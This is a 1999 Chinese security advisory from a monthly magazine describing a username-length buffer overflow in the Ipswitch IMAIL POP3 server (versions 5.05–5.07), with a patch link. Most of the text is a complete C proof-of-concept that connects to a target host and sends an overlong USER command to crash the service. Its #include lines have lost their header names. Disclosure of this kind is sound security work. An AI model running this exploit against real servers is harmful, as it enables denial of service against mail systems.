首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第3期->最新漏洞
作者:Interrupt (mike@eeye.com)
主页:http://www.ipswitch.com
日期:1999-11-15
◆Ipswitch's IMAIL POP3 server漏洞
发现者:Interrupt (mike@eeye.com)
由于在 Ipswitch's IMAIL POP3服务器中没有进行恰当的边界检查,当发送一个长用户名时 (via "USER <200-500字符>"),系统产生了漏洞。
在5.07、5.06、5.05版中都存在此问题,此问题可能引发拒绝服务问题,其他级别的危害程度尚未验证。
Exploit (by Interrupt):
/*
* IMAIL 5.07 POP3 Overflow
* By: Mike@eEye.com
*
* Demonstrates vulnerability
*/
#include
#include
#ifdef WINDOWS
#include
#include
#else
#include
#include
#include
#include
#endif
#ifndef WINDOWS
#define SOCKET_ERROR -1
#define closesocket(sock) close(sock)
#define WSACleanup() ;
#endif
char overflow[] =
"USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";
int main(int argc, char *argv[])
{
#ifdef WINDOWS
WSADATA wsaData;
#endif
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
char *hostname;
unsigned short port;
if (argc <= 1)
{
printf("IMAIL POP3 Overflow\n");
printf("By: Mike@eEye.com\n\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("If port is not specified we use '110'\n");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("110");
printf("IMAIL POP3 Overflow\n");
printf("By: Mike@eEye.com\n\n");
#ifdef WINDOWS
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
#endif
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
/* Check to see if we get a +OK error code. If so then proceed. */
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
buf[bytes] = '\0';
check = strstr(buf, "+OK");
if (check == NULL)
{
printf("ERROR: NO +OK response from inital connect\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Sent.\n");
closesocket(sockfd);
WSACleanup();
}
补丁:
下载最新版软件:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe
版权所有,未经许可,不得转载